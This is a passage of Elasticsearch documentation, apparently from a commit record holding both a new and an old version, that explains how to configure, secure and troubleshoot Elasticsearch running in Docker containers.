memlock=-1:-1\n----\n\n===== Randomize published ports\n\nThe image https:\/\/docs.docker.com\/engine\/reference\/builder\/#\/expose[exposes]\nTCP ports 9200 and 9300. For production clusters, randomizing the\npublished ports with `--publish-all` is recommended,\nunless you are pinning one container per host.\n\n[[docker-set-heap-size]]\n===== Manually set the heap size\n\nBy default, {es} automatically sizes JVM heap based on a nodes's\n<<node-roles,roles>> and the total memory available to the node's container. We\nrecommend this default sizing for most production environments. If needed, you\ncan override default sizing by manually setting JVM heap size.\n\nTo manually set the heap size in production, bind mount a <<set-jvm-options,JVM\noptions>> file under `\/usr\/share\/elasticsearch\/config\/jvm.options.d` that\nincludes your desired <<set-jvm-heap-size,heap size>> settings.\n\nFor testing, you can also manually set the heap size using the `ES_JAVA_OPTS`\nenvironment variable. For example, to use 16GB, specify `-e\nES_JAVA_OPTS=\"-Xms16g -Xmx16g\"` with `docker run`. The `ES_JAVA_OPTS` variable\noverrides all other JVM options. The `ES_JAVA_OPTS` variable overrides all other\nJVM options. We do not recommend using `ES_JAVA_OPTS` in production. The\n`docker-compose.yml` file above sets the heap size to 512MB.\n\n\n===== Pin deployments to a specific image version\n\nPin your deployments to a specific version of the {es} Docker image. For\nexample +docker.elastic.co\/elasticsearch\/elasticsearch:{version}+.\n\n===== Always bind data volumes\n\nYou should use a volume bound on `\/usr\/share\/elasticsearch\/data` for the following reasons:\n\n. The data of your {es} node won't be lost if the container is killed\n\n. {es} is I\/O sensitive and the Docker storage driver is not ideal for fast I\/O\n\n. It allows the use of advanced\nhttps:\/\/docs.docker.com\/engine\/extend\/plugins\/#volume-plugins[Docker volume plugins]\n\n===== Avoid using `loop-lvm` mode\n\nIf you are using the devicemapper storage driver, do not use the default `loop-lvm` mode.\nConfigure docker-engine to use\nhttps:\/\/docs.docker.com\/engine\/userguide\/storagedriver\/device-mapper-driver\/#configure-docker-with-devicemapper[direct-lvm].\n\n===== Centralize your logs\n\nConsider centralizing your logs by using a different\nhttps:\/\/docs.docker.com\/engine\/admin\/logging\/overview\/[logging driver]. Also\nnote that the default json-file logging driver is not ideally suited for\nproduction use.\n\n[[docker-configuration-methods]]\n==== Configuring {es} with Docker\n\nWhen you run in Docker, the <<config-files-location,{es} configuration files>> are loaded from\n`\/usr\/share\/elasticsearch\/config\/`.\n\nTo use custom configuration files, you <<docker-config-bind-mount, bind-mount the files>>\nover the configuration files in the image.\n\nYou can set individual {es} configuration parameters using Docker environment variables.\nThe <<docker-compose-file, sample compose file>> and the\n<<docker-cli-run-dev-mode, single-node example>> use this method. You can\nuse the setting name directly as the environment variable name. If\nyou cannot do this, for example because your orchestration platform forbids\nperiods in environment variable names, then you can use an alternative\nstyle by converting the setting name as follows.\n\n. Change the setting name to uppercase\n. Prefix it with `ES_SETTING_`\n. Escape any underscores (`_`) by duplicating them\n. Convert all periods (`.`) to underscores (`_`)\n\nFor example, `-e bootstrap.memory_lock=true` becomes\n`-e ES_SETTING_BOOTSTRAP_MEMORY__LOCK=true`.\n\nYou can use the contents of a file to set the value of the\n`ELASTIC_PASSWORD` or `KEYSTORE_PASSWORD` environment variables, by\nsuffixing the environment variable name with `_FILE`. This is useful for\npassing secrets such as passwords to {es} without specifying them directly.\n\nFor example, to set the {es} bootstrap password from a file, you can bind mount the\nfile and set the `ELASTIC_PASSWORD_FILE` environment variable to the mount location.\nIf you mount the password file to `\/run\/secrets\/bootstrapPassword.txt`, specify:\n\n[source,sh]\n--------------------------------------------\n-e ELASTIC_PASSWORD_FILE=\/run\/secrets\/bootstrapPassword.txt\n--------------------------------------------\n\nYou can override the default command for the image to pass {es} configuration\nparameters as command line options. For example:\n\n[source,sh]\n--------------------------------------------\ndocker run <various parameters> bin\/elasticsearch -Ecluster.name=mynewclustername\n--------------------------------------------\n\nWhile bind-mounting your configuration files is usually the preferred method in production,\nyou can also <<_c_customized_image, create a custom Docker image>>\nthat contains your configuration.\n\n[[docker-config-bind-mount]]\n===== Mounting {es} configuration files\n\nCreate custom config files and bind-mount them over the corresponding files in the Docker image.\nFor example, to bind-mount `custom_elasticsearch.yml` with `docker run`, specify:\n\n[source,sh]\n--------------------------------------------\n-v full_path_to\/custom_elasticsearch.yml:\/usr\/share\/elasticsearch\/config\/elasticsearch.yml\n--------------------------------------------\n\nIf you bind-mount a custom `elasticsearch.yml` file, ensure it includes the\n`network.host: 0.0.0.0` setting. This setting ensures the node is reachable for\nHTTP and transport traffic, provided its ports are exposed. The Docker image's\nbuilt-in `elasticsearch.yml` file includes this setting by default.\n\nIMPORTANT: The container **runs {es} as user `elasticsearch` using\nuid:gid `1000:0`**. Bind mounted host directories and files must be accessible by this user,\nand the data and log directories must be writable by this user.\n\n[[docker-keystore-bind-mount]]\n===== Create an encrypted {es} keystore\n\nBy default, {es} will auto-generate a keystore file for <<secure-settings,secure\nsettings>>. This file is obfuscated but not encrypted.\n\nTo encrypt your secure settings with a password and have them persist outside\nthe container, use a `docker run` command to manually create the keystore\ninstead. The command must:\n\n* Bind-mount the `config` directory. The command will create an\n `elasticsearch.keystore` file in this directory. To avoid errors, do\n not directly bind-mount the `elasticsearch.keystore` file.\n* Use the `elasticsearch-keystore` tool with the `create -p` option. You'll be\n prompted to enter a password for the keystore.\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\nFor example:\n\n[source,sh,subs=\"attributes\"]\n----\ndocker run -it --rm \\\n-v full_path_to\/config:\/usr\/share\/elasticsearch\/config \\\ndocker.elastic.co\/elasticsearch\/elasticsearch:{version} \\\nbin\/elasticsearch-keystore create -p\n----\n\nYou can also use a `docker run` command to add or update secure settings in the\nkeystore. You'll be prompted to enter the setting values. If the keystore is\nencrypted, you'll also be prompted to enter the keystore password.\n\n[source,sh,subs=\"attributes\"]\n----\ndocker run -it --rm \\\n-v full_path_to\/config:\/usr\/share\/elasticsearch\/config \\\ndocker.elastic.co\/elasticsearch\/elasticsearch:{version} \\\nbin\/elasticsearch-keystore \\\nadd my.secure.setting \\\nmy.other.secure.setting\n----\nendif::[]\n\nIf you've already created the keystore and don't need to update it, you can\nbind-mount the `elasticsearch.keystore` file directly. You can use the\n`KEYSTORE_PASSWORD` environment variable to provide the keystore password to the\ncontainer at startup. For example, a `docker run` command might have the\nfollowing options:\n\n[source,sh]\n----\n-v full_path_to\/config\/elasticsearch.keystore:\/usr\/share\/elasticsearch\/config\/elasticsearch.keystore\n-e KEYSTORE_PASSWORD=mypassword\n----\n\n[[_c_customized_image]]\n===== Using custom Docker images\nIn some environments, it might make more sense to prepare a custom image that contains\nyour configuration. A `Dockerfile` to achieve this might be as simple as:\n\n[source,sh,subs=\"attributes\"]\n--------------------------------------------\nFROM docker.elastic.co\/elasticsearch\/elasticsearch:{version}\nCOPY --chown=elasticsearch:elasticsearch elasticsearch.yml \/usr\/share\/elasticsearch\/config\/\n--------------------------------------------\n\nYou could then build and run the image with:\n\n[source,sh]\n--------------------------------------------\ndocker build --tag=elasticsearch-custom .\ndocker run -ti -v \/usr\/share\/elasticsearch\/data elasticsearch-custom\n--------------------------------------------\n\nSome plugins require additional security permissions.\nYou must explicitly accept them either by:\n\n* Attaching a `tty` when you run the Docker image and allowing the permissions when prompted.\n* Inspecting the security permissions and accepting them (if appropriate) by adding the `--batch` flag to the plugin install command.\n\nSee {plugins}\/_other_command_line_parameters.html[Plugin management]\nfor more information.\n\nThe {es} Docker image only includes what is required to run {es}, and does\nnot provide a package manager. It is possible to add additional utilities\nwith a multi-phase Docker build. You must also copy any dependencies, for\nexample shared libraries.\n\n[source,sh,subs=\"attributes\"]\n--------------------------------------------\nFROM centos:8 AS builder\nyum install -y some-package\n\nFROM docker.elastic.co\/elasticsearch\/elasticsearch:{version}\nCOPY --from=builder \/usr\/bin\/some-utility \/usr\/bin\/\nCOPY --from=builder \/usr\/lib\/some-lib.so \/usr\/lib\/\n--------------------------------------------\n\nYou should use `centos:8` as a base in order to avoid incompatibilities.\nUse http:\/\/man7.org\/linux\/man-pages\/man1\/ldd.1.html[`ldd`] to list the\nshared libraries required by a utility.\n\n[discrete]\n[[troubleshoot-docker-errors]]\n==== Troubleshoot Docker errors for {es}\n\nHere\u2019s how to resolve common errors when running {es} with Docker.\n\n===== elasticsearch.keystore is a directory\n\n[source,txt]\n----\nException in thread \"main\" org.elasticsearch.bootstrap.BootstrapException: java.io.IOException: Is a directory: SimpleFSIndexInput(path=\"\/usr\/share\/elasticsearch\/config\/elasticsearch.keystore\") Likely root cause: java.io.IOException: Is a directory\n----\n\nA <<docker-keystore-bind-mount,keystore-related>> `docker run` command attempted\nto directly bind-mount an `elasticsearch.keystore` file that doesn't exist. If\nyou use the `-v` or `--volume` flag to mount a file that doesn't exist, Docker\ninstead creates a directory with the same name.\n\nTo resolve this error:\n\n. Delete the `elasticsearch.keystore` directory in the `config` directory.\n. Update the `-v` or `--volume` flag to point to the `config` directory path\n rather than the keystore file's path. For an example, see\n <<docker-keystore-bind-mount>>.\n. Retry the command.\n\n===== elasticsearch.keystore: Device or resource busy\n\n[source,txt]\n----\nException in thread \"main\" java.nio.file.FileSystemException: \/usr\/share\/elasticsearch\/config\/elasticsearch.keystore.tmp -> \/usr\/share\/elasticsearch\/config\/elasticsearch.keystore: Device or resource busy\n----\n\nA `docker run` command attempted to <<docker-keystore-bind-mount,update the\nkeystore>> while directly bind-mounting the `elasticsearch.keystore` file. To\nupdate the keystore, the container requires access to other files in the\n`config` directory, such as `keystore.tmp`.\n\nTo resolve this error:\n\n. Update the `-v` or `--volume` flag to point to the `config` directory\n path rather than the keystore file's path. For an example, see\n <<docker-keystore-bind-mount>>.\n. Retry the command.","old_contents":"[[docker]]\n=== Install {es} with Docker\n\n{es} is also available as Docker images. Starting with version 8.0.0, these\nare based upon a tiny core of essential files. Prior versions used\nhttps:\/\/hub.docker.com\/_\/centos\/[centos:8] as the base image.\n\nA list of all published Docker images and tags is available at\nhttps:\/\/www.docker.elastic.co[www.docker.elastic.co]. The source files\nare in\nhttps:\/\/github.com\/elastic\/elasticsearch\/blob\/{branch}\/distribution\/docker[Github].\n\ninclude::license.asciidoc[]\n\nStarting in {es} 8.0, security is enabled by default. With security enabled,\n{stack} {security-features} require TLS encryption for the transport networking\nlayer, or your cluster will fail to start.\n\n==== Install Docker Desktop or Docker Engine\n\nInstall the appropriate https:\/\/docs.docker.com\/get-docker\/[Docker application]\nfor your operating system.\n\nNOTE: Make sure that Docker is allotted at least 4GiB of memory. In Docker\nDesktop, you configure resource usage on the Advanced tab in Preference (macOS)\nor Settings (Windows).\n\n==== Pull the {es} Docker image\n\nObtaining {es} for Docker is as simple as issuing a `docker pull` command\nagainst the Elastic Docker registry.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so no\nDocker image is currently available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n\n[source,sh,subs=\"attributes\"]\n----\ndocker pull {docker-repo}:{version}\n----\n\nendif::[]\n\nNow that you have the {es} Docker image, you can start a \n<<docker-cli-run-dev-mode,single-node>> or <<docker-compose-file,multi-node>>\ncluster.\n\n[[docker-cli-run-dev-mode]]\n==== Start a single-node cluster with Docker\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of the {es} Docker image has not yet been released.\n\nendif::[]\n\nIf you're starting a single-node {es} cluster in a Docker container, security\nwill be automatically enabled and configured for you. When you start {es} for\nthe first time, the following security configuration occurs automatically:\n\n* <<elasticsearch-security-certificates,Certificates and keys>> are generated\nfor the transport and HTTP layers.\n* The Transport Layer Security (TLS) configuration settings are written to\n`elasticsearch.yml`.\n* A password is generated for the `elastic` user.\n* An enrollment token is generated for {kib}.\n\nYou can then {kibana-ref}\/docker.html[start {kib}] and enter the enrollment\ntoken, which is valid for 30 minutes. This token automatically applies the\nsecurity settings from your {es} cluster, authenticates to {es} with the\n`kibana_system` user, and writes the security configuration to `kibana.yml`. \n\nThe following command starts a single-node {es} cluster for development or\ntesting.\n\n. Start {es} in Docker. A password is generated for the `elastic` user and\noutput to the terminal, plus an enrollment token for enrolling {kib}.\n+\n--\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,sh,subs=\"attributes\"]\n----\ndocker run --name es-node01 -p 9200:9200 -p 9300:9300 -it {docker-image}\n----\n\nendif::[]\n--\n+\nTIP: You might need to scroll back a bit in the terminal to view the password\nand enrollment token.\n\n. Copy the generated password and enrollment token and save them in a secure\nlocation. These values are shown only when you start {es} for the first time.\n+\n[NOTE]\n====\nIf you need to reset the password for the `elastic` user or other\nbuilt-in users, run the <<reset-password,`elasticsearch-reset-password`>> tool.\nThis tool is available in the {es} `\/bin` directory of the Docker container.\nFor example:\n\n[source,sh]\n----\ndocker exec -it es-node01 \/usr\/share\/elasticsearch\/bin\/reset-elastic-password\n----\n====\n\n. Copy the `http_ca.crt` security certificate from your Docker container to\nyour local machine.\n+\n[source,sh]\n----\ndocker cp es-node01:\/usr\/share\/elasticsearch\/config\/tls_auto_config_*\/http_ca.crt .\n----\n\n. Open a new terminal and verify that you can connect to your {es} cluster by\nmaking an authenticated call, using the `http_ca.crt` file that you copied from\nyour Docker container. Enter the password for the `elastic` user when prompted.\n+\n[source,sh]\n----\ncurl --cacert http_ca.crt -u elastic https:\/\/localhost:9200\n----\n\/\/ NOTCONSOLE\n\n===== Next steps\n\nYou now have a test {es} environment set up. Before you start\nserious development or go into production with {es}, review the\n<<docker-prod-prerequisites,requirements and recommendations>> to apply when running {es} in Docker in production.\n\n[[elasticsearch-security-certificates]]\n===== Security certificates and keys\n\nWhen you start {es} for the first time, the following certificates and keys are\ngenerated in the\n`\/usr\/share\/elasticsearch\/config\/tls_auto_config_initial_node_<timestamp>`\ndirectory in the Docker container, and allow you to connect a {kib} instance\nto your secured {es} cluster and encrypt internode communication. The files are\nlisted here for reference.\n\n`http_ca.crt`::\nThe CA certificate that is used to sign the certificates for the HTTP layer of\nthis {es} cluster.\n\n`http_keystore_local_node.p12`::\nKeystore that contains the key and certificate for the HTTP layer for this node.\n\n`transport_keystore_all_nodes.p12`::\nKeystore that contains the key and certificate for the transport layer for all\nthe nodes in your cluster.\n\n[[docker-compose-file]]\n==== Start a multi-node cluster with Docker Compose\n\nWhen defining multiple nodes in a `docker-compose.yml` file, you'll need to\nexplicitly enable and configure security so that {es} doesn't try to generate a\npassword for the `elastic` user on every node. \n\n===== Prepare the environment\n\nThe following example uses Docker Compose to start a three-node {es} cluster.\nCreate each of the following files inside of a new directory. Copy and paste the\ncontents of each example into the appropriate file as described in the\nfollowing sections:\n\n* <<docker-instances-yml,`instances.yml`>>\n* <<docker-env,`.env`>>\n* <<docker-create-certs,`create-certs.yml`>>\n* <<docker-docker-compose,`docker-compose.yml`>>\n\n[[docker-instances-yml]]\n[discrete]\n===== `instances.yml`\n\nWhen you run the example, {es} uses this file to create a three-node cluster.\nThe nodes are named `es01`, `es02`,and `es03`.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::instances.yml[]\n----\nendif::[]\n--\n\n[[docker-env]]\n[discrete]\n===== `.env`\n\nThe `.env` file sets environment variables that are used when you run the\nexample. Ensure that you specify a strong password for the `elastic` user with\nthe `ELASTIC_PASSWORD` variable. This variable is referenced by the\n`docker-compose.yml` file.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::.env[]\n----\nendif::[]\n--\n\n`COMPOSE_PROJECT_NAME`:: Adds an `es_` prefix for all volumes and networks\ncreated by `docker-compose`.\n\n`CERTS_DIR`:: Specifies the path inside the Docker image where {es} expects the\nsecurity certificates.\n\n`ELASTIC_PASSWORD`:: Sets the initial password for the `elastic` user.\n\n[discrete]\n[[docker-create-certs]]\n===== `create-certs.yml`\n\nThe `create-certs.yml` file includes a script that generates node certificates\nand a certificate authority (CA) certificate and key where {es} expects them.\nThese certificates and key are placed in a Docker volume named `es_certs`.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::create-certs.yml[]\n----\nendif::[]\n--\n\n[[docker-docker-compose]]\n[discrete]\n===== `docker-compose.yml`\n\nThe `docker-compose.yml` file defines configuration settings for each of your\n{es} nodes.\n\nNOTE: This sample `docker-compose.yml` file uses the `ES_JAVA_OPTS`\nenvironment variable to manually set the heap size to 512MB. We do not recommend\nusing `ES_JAVA_OPTS` in production.\nSee <<docker-set-heap-size,manually set the heap size>>.\n\nThis configuration exposes port `9200` on all network interfaces. Given how\nDocker manipulates `iptables` on Linux, this means that your {es} cluster is\npublicly accessible, potentially ignoring any firewall settings. If you don't\nwant to expose port `9200` and instead use a reverse proxy, replace `9200:9200`\nwith `127.0.0.1:9200:9200` in the `docker-compose.yml` file. {es} will then only\nbe accessible from the host machine itself.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n+\n--\nWARNING: Version {version} of {es} has not yet been released, so a\n`docker-compose.yml` is not available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n[source,yaml,subs=\"attributes\"]\n----\ninclude::docker-compose.yml[]\n----\nendif::[]\n--\n\n===== Start your cluster with security enabled and configured\n\nThis sample Docker Compose file starts a three-node {es} cluster.\n\nThe https:\/\/docs.docker.com\/storage\/volumes[Docker named volumes]\n`data01`, `data02`, and `data03` store the node data directories so that the\ndata persists across restarts. If they don't already exist, running\n`docker-compose` creates these volumes.\n\n[[docker-generate-certificates]]\n. Generate the certificates. You only need to run this command one time:\n+\n[\"source\",\"sh\"]\n----\ndocker-compose -f create-certs.yml run --rm create_certs\n----\n\n. Start your {es} nodes with TLS configured on the transport layer:\n+\n[\"source\",\"sh\"]\n----\ndocker-compose up -d\n----\n+\nNode `es01` listens on `localhost:9200` and `es02` and `es03` talk to `es01`\nover a Docker network.\n\n. Access the {es} API over TLS using the bootstrapped password for the `elastic`\nuser that you specified in the `.env` file:\n+\n[\"source\",\"sh\",subs=\"attributes\"]\n----\ndocker run --rm -v es_certs:\/certs --network=es_default {docker-image} curl --cacert \/certs\/ca\/ca.crt -u elastic:<password> https:\/\/es01:9200\n----\n\/\/ NOTCONSOLE\n+\n--\n`es_certs`:: The name of the volume that the script in `create-certs.yml`\ncreates to hold your certificates.\n\n`<password>`:: The password for the `elastic` user, defined by the\n`ELASTIC_PASSWORD` variable in the `.env` file.\n--\n\n. Submit a `_cat\/nodes` request to check that the nodes are up and running:\n+\n[source,sh]\n----\ncurl -X GET \"https:\/\/localhost:9200\/_cat\/nodes?v=true&pretty\"\n----\n\/\/ NOTCONSOLE\n\nLog messages go to the console and are handled by the configured Docker logging\ndriver. By default, you can access logs with `docker logs`. If you prefer that\nthe {es} container write logs to disk, set the `ES_LOG_STYLE` environment\nvariable to `file`. This causes {es} to use the same logging configuration as\nother {es} distribution formats.\n\nIf you need to generate a new password for the `elastic` user or any of the\nbuilt-in users, use the `elasticsearch-reset-password` tool:\n\nWARNING: Windows users not running PowerShell must remove all backslashes (`\\`)\nand join lines in the following command.\n\n[\"source\",\"sh\"]\n----\ndocker exec es01 \/bin\/bash -c \"bin\/elasticsearch-reset-password \\\nauto --batch \\\n--url https:\/\/localhost:9200\"\n----\n\n===== Stop the cluster\nTo stop the cluster, run `docker-compose down`. The data in the Docker volumes\nis preserved and loaded when you restart the cluster with `docker-compose up`.\n\n--\n[\"source\",\"sh\"]\n----\ndocker-compose down\n----\n--\n\nTo **delete the data volumes** when you stop the cluster, specify the `-v`\noption:\n\n[\"source\",\"sh\"]\n----\ndocker-compose down -v\n----\n\nWARNING: Deleting data volumes will remove the generated security certificates\nfor your nodes. You will need to run `docker-compose` and \n<<docker-generate-certificates,regenerate the security certificates>> before\nstarting your cluster.\n\n===== Next steps\n\nYou now have a test {es} environment set up. Before you start\nserious development or go into production with {es}, review the\n<<docker-prod-prerequisites,requirements and recommendations>> to apply when running {es} in Docker in production.\n\n[[docker-prod-prerequisites]]\n==== Using the Docker images in production\n\nThe following requirements and recommendations apply when running {es} in Docker in production.\n\n===== Set `vm.max_map_count` to at least `262144`\n\nThe `vm.max_map_count` kernel setting must be set to at least `262144` for production use.\n\nHow you set `vm.max_map_count` depends on your platform:\n\n* Linux\n+\n--\nThe `vm.max_map_count` setting should be set permanently in `\/etc\/sysctl.conf`:\n[source,sh]\n--------------------------------------------\ngrep vm.max_map_count \/etc\/sysctl.conf\nvm.max_map_count=262144\n--------------------------------------------\n\nTo apply the setting on a live system, run:\n\n[source,sh]\n--------------------------------------------\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n* macOS with https:\/\/docs.docker.com\/docker-for-mac[Docker for Mac]\n+\n--\nThe `vm.max_map_count` setting must be set within the xhyve virtual machine:\n\n. From the command line, run:\n+\n[source,sh]\n--------------------------------------------\nscreen ~\/Library\/Containers\/com.docker.docker\/Data\/vms\/0\/tty\n--------------------------------------------\n\n. Press enter and use`sysctl` to configure `vm.max_map_count`:\n+\n[source,sh]\n--------------------------------------------\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n\n. To exit the `screen` session, type `Ctrl a d`.\n--\n\n* Windows and macOS with https:\/\/www.docker.com\/products\/docker-desktop[Docker Desktop]\n+\n--\nThe `vm.max_map_count` setting must be set via docker-machine:\n\n[source,sh]\n--------------------------------------------\ndocker-machine ssh\nsudo sysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n* Windows with https:\/\/docs.docker.com\/docker-for-windows\/wsl[Docker Desktop WSL 2 backend]\n+\n--\nThe `vm.max_map_count` setting must be set in the docker-desktop container:\n\n[source,sh]\n--------------------------------------------\nwsl -d docker-desktop\nsysctl -w vm.max_map_count=262144\n--------------------------------------------\n--\n\n===== Configuration files must be readable by the `elasticsearch` user\n\nBy default, {es} runs inside the container as user `elasticsearch` using\nuid:gid `1000:0`.\n\nIMPORTANT: One exception is https:\/\/docs.openshift.com\/container-platform\/3.6\/creating_images\/guidelines.html#openshift-specific-guidelines[Openshift],\nwhich runs containers using an arbitrarily assigned user ID.\nOpenshift presents persistent volumes with the gid set to `0`, which works without any adjustments.\n\nIf you are bind-mounting a local directory or file, it must be readable by the `elasticsearch` user.\nIn addition, this user must have write access to the <<path-settings,config, data and log dirs>>\n({es} needs write access to the `config` directory so that it can generate a keystore).\nA good strategy is to grant group access to gid `0` for the local directory.\n\nFor example, to prepare a local directory for storing data through a bind-mount:\n\n[source,sh]\n--------------------------------------------\nmkdir esdatadir\nchmod g+rwx esdatadir\nchgrp 0 esdatadir\n--------------------------------------------\n\nYou can also run an {es} container using both a custom UID and GID. Unless you\nbind-mount each of the `config`, `data` and `logs` directories, you must pass\nthe command line option `--group-add 0` to `docker run`. This ensures that the user\nunder which {es} is running is also a member of the `root` (GID 0) group inside the\ncontainer.\n\n===== Increase ulimits for nofile and nproc\n\nIncreased ulimits for <<setting-system-settings,nofile>> and <<max-number-threads-check,nproc>>\nmust be available for the {es} containers.\nVerify the https:\/\/github.com\/moby\/moby\/tree\/ea4d1243953e6b652082305a9c3cda8656edab26\/contrib\/init[init system]\nfor the Docker daemon sets them to acceptable values.\n\nTo check the Docker daemon defaults for ulimits, run:\n\n[source,sh]\n--------------------------------------------\ndocker run --rm centos:8 \/bin\/bash -c 'ulimit -Hn && ulimit -Sn && ulimit -Hu && ulimit -Su'\n--------------------------------------------\n\nIf needed, adjust them in the Daemon or override them per container.\nFor example, when using `docker run`, set:\n\n[source,sh]\n--------------------------------------------\n--ulimit nofile=65535:65535\n--------------------------------------------\n\n===== Disable swapping\n\nSwapping needs to be disabled for performance and node stability.\nFor information about ways to do this, see <<setup-configuration-memory>>.\n\nIf you opt for the `bootstrap.memory_lock: true` approach,\nyou also need to define the `memlock: true` ulimit in the\nhttps:\/\/docs.docker.com\/engine\/reference\/commandline\/dockerd\/#default-ulimits[Docker Daemon],\nor explicitly set for the container as shown in the <<docker-compose-file, sample compose file>>.\nWhen using `docker run`, you can specify:\n\n[source,sh]\n----\n-e \"bootstrap.memory_lock=true\" --ulimit memlock=-1:-1\n----\n\n===== Randomize published ports\n\nThe image https:\/\/docs.docker.com\/engine\/reference\/builder\/#\/expose[exposes]\nTCP ports 9200 and 9300. For production clusters, randomizing the\npublished ports with `--publish-all` is recommended,\nunless you are pinning one container per host.\n\n[[docker-set-heap-size]]\n===== Manually set the heap size\n\nBy default, {es} automatically sizes JVM heap based on a nodes's\n<<node-roles,roles>> and the total memory available to the node's container. We\nrecommend this default sizing for most production environments. If needed, you\ncan override default sizing by manually setting JVM heap size.\n\nTo manually set the heap size in production, bind mount a <<set-jvm-options,JVM\noptions>> file under `\/usr\/share\/elasticsearch\/config\/jvm.options.d` that\nincludes your desired <<set-jvm-heap-size,heap size>> settings.\n\nFor testing, you can also manually set the heap size using the `ES_JAVA_OPTS`\nenvironment variable. For example, to use 16GB, specify `-e\nES_JAVA_OPTS=\"-Xms16g -Xmx16g\"` with `docker run`. The `ES_JAVA_OPTS` variable\noverrides all other JVM options. The `ES_JAVA_OPTS` variable overrides all other\nJVM options. We do not recommend using `ES_JAVA_OPTS` in production. The\n`docker-compose.yml` file above sets the heap size to 512MB.\n\n\n===== Pin deployments to a specific image version\n\nPin your deployments to a specific version of the {es} Docker image. For\nexample +docker.elastic.co\/elasticsearch\/elasticsearch:{version}+.\n\n===== Always bind data volumes\n\nYou should use a volume bound on `\/usr\/share\/elasticsearch\/data` for the following reasons:\n\n. The data of your {es} node won't be lost if the container is killed\n\n. {es} is I\/O sensitive and the Docker storage driver is not ideal for fast I\/O\n\n. It allows the use of advanced\nhttps:\/\/docs.docker.com\/engine\/extend\/plugins\/#volume-plugins[Docker volume plugins]\n\n===== Avoid using `loop-lvm` mode\n\nIf you are using the devicemapper storage driver, do not use the default `loop-lvm` mode.\nConfigure docker-engine to use\nhttps:\/\/docs.docker.com\/engine\/userguide\/storagedriver\/device-mapper-driver\/#configure-docker-with-devicemapper[direct-lvm].\n\n===== Centralize your logs\n\nConsider centralizing your logs by using a different\nhttps:\/\/docs.docker.com\/engine\/admin\/logging\/overview\/[logging driver]. Also\nnote that the default json-file logging driver is not ideally suited for\nproduction use.\n\n[[docker-configuration-methods]]\n==== Configuring {es} with Docker\n\nWhen you run in Docker, the <<config-files-location,{es} configuration files>> are loaded from\n`\/usr\/share\/elasticsearch\/config\/`.\n\nTo use custom configuration files, you <<docker-config-bind-mount, bind-mount the files>>\nover the configuration files in the image.\n\nYou can set individual {es} configuration parameters using Docker environment variables.\nThe <<docker-compose-file, sample compose file>> and the\n<<docker-cli-run-dev-mode, single-node example>> use this method. You can\nuse the setting name directly as the environment variable name. If\nyou cannot do this, for example because your orchestration platform forbids\nperiods in environment variable names, then you can use an alternative\nstyle by converting the setting name as follows.\n\n. Change the setting name to uppercase\n. Prefix it with `ES_SETTING_`\n. Escape any underscores (`_`) by duplicating them\n. Convert all periods (`.`) to underscores (`_`)\n\nFor example, `-e bootstrap.memory_lock=true` becomes\n`-e ES_SETTING_BOOTSTRAP_MEMORY__LOCK=true`.\n\nYou can use the contents of a file to set the value of the\n`ELASTIC_PASSWORD` or `KEYSTORE_PASSWORD` environment variables, by\nsuffixing the environment variable name with `_FILE`. This is useful for\npassing secrets such as passwords to {es} without specifying them directly.\n\nFor example, to set the {es} bootstrap password from a file, you can bind mount the\nfile and set the `ELASTIC_PASSWORD_FILE` environment variable to the mount location.\nIf you mount the password file to `\/run\/secrets\/bootstrapPassword.txt`, specify:\n\n[source,sh]\n--------------------------------------------\n-e ELASTIC_PASSWORD_FILE=\/run\/secrets\/bootstrapPassword.txt\n--------------------------------------------\n\nYou can override the default command for the image to pass {es} configuration\nparameters as command line options. For example:\n\n[source,sh]\n--------------------------------------------\ndocker run <various parameters> bin\/elasticsearch -Ecluster.name=mynewclustername\n--------------------------------------------\n\nWhile bind-mounting your configuration files is usually the preferred method in production,\nyou can also <<_c_customized_image, create a custom Docker image>>\nthat contains your configuration.\n\n[[docker-config-bind-mount]]\n===== Mounting {es} configuration files\n\nCreate custom config files and bind-mount them over the corresponding files in the Docker image.\nFor example, to bind-mount `custom_elasticsearch.yml` with `docker run`, specify:\n\n[source,sh]\n--------------------------------------------\n-v full_path_to\/custom_elasticsearch.yml:\/usr\/share\/elasticsearch\/config\/elasticsearch.yml\n--------------------------------------------\n\nIMPORTANT: The container **runs {es} as user `elasticsearch` using\nuid:gid `1000:0`**. Bind mounted host directories and files must be accessible by this user,\nand the data and log directories must be writable by this user.\n\n[[docker-keystore-bind-mount]]\n===== Create an encrypted {es} keystore\n\nBy default, {es} will auto-generate a keystore file for <<secure-settings,secure\nsettings>>. This file is obfuscated but not encrypted.\n\nTo encrypt your secure settings with a password and have them persist outside\nthe container, use a `docker run` command to manually create the keystore\ninstead. The command must:\n\n* Bind-mount the `config` directory. The command will create an\n `elasticsearch.keystore` file in this directory. To avoid errors, do\n not directly bind-mount the `elasticsearch.keystore` file.\n* Use the `elasticsearch-keystore` tool with the `create -p` option. You'll be\n prompted to enter a password for the keystore.\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\nFor example:\n\n[source,sh,subs=\"attributes\"]\n----\ndocker run -it --rm \\\n-v full_path_to\/config:\/usr\/share\/elasticsearch\/config 